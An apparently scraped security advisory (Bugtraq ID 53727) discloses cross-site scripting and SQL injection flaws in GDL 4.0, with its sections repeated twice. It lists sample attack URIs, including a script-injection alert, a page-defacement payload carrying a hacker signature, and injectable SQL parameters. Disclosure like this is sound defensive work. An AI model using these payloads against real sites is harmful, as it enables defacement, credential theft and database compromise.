GDL Multiple Cross Site Scripting and SQL Injection Vulnerabilities
BID:53727
Info
GDL Multiple Cross Site Scripting and SQL Injection Vulnerabilities
| Bugtraq ID: | 53727 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 30 2012 12:00AM |
| Updated: | May 30 2012 12:00AM |
| Credit: | X-Cisadane |
| Vulnerable: |
Knowledge Management Research Group GDL 4.0 |
| Not Vulnerable: | |
Discussion
GDL Multiple Cross Site Scripting and SQL Injection Vulnerabilities
GDL is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GDL 4.0 is vulnerable; prior versions may also be affected.
GDL is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GDL 4.0 is vulnerable; prior versions may also be affected.
Exploit / POC
GDL Multiple Cross Site Scripting and SQL Injection Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
Cross-site scripting:
http://www.example.com/pustaka/search.php?s=[Insert XSS Script]
http://www.example.com/office.php?m=lang&langid='"><script>alert(1337)</script>
http://www.example.com/publisher.php?id=<script>document.body.innerHTML="<h1>XSS
Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni,
Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit
http://xcode.or.id";</script>
SQL-injection:
http://www.example.com/go.php?id=['SQL]
http://www.example.com/publisher.php?id=['SQL]
http://www.example.com/go.php?node=['SQL]
http://www.example.com/office.php?m=explorer&a=['SQL]&b=expand&w=0
http://www.example.com/office.php?m=user&a=['SQL]
http://www.example.com/office.php?m=workgroup&a=['SQL]&b=edit
http://www.example.com/office.php?m=user&so=desc&sb=['SQL]
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
Cross-site scripting:
http://www.example.com/pustaka/search.php?s=[Insert XSS Script]
http://www.example.com/office.php?m=lang&langid='"><script>alert(1337)</script>
http://www.example.com/publisher.php?id=<script>document.body.innerHTML="<h1>XSS
Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni,
Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit
http://xcode.or.id";</script>
SQL-injection:
http://www.example.com/go.php?id=['SQL]
http://www.example.com/publisher.php?id=['SQL]
http://www.example.com/go.php?node=['SQL]
http://www.example.com/office.php?m=explorer&a=['SQL]&b=expand&w=0
http://www.example.com/office.php?m=user&a=['SQL]
http://www.example.com/office.php?m=workgroup&a=['SQL]&b=edit
http://www.example.com/office.php?m=user&so=desc&sb=['SQL]
Solution / Fix
GDL Multiple Cross Site Scripting and SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
GDL Multiple Cross Site Scripting and SQL Injection Vulnerabilities
References:
References:
- GDL Homepage (knowledge management research group)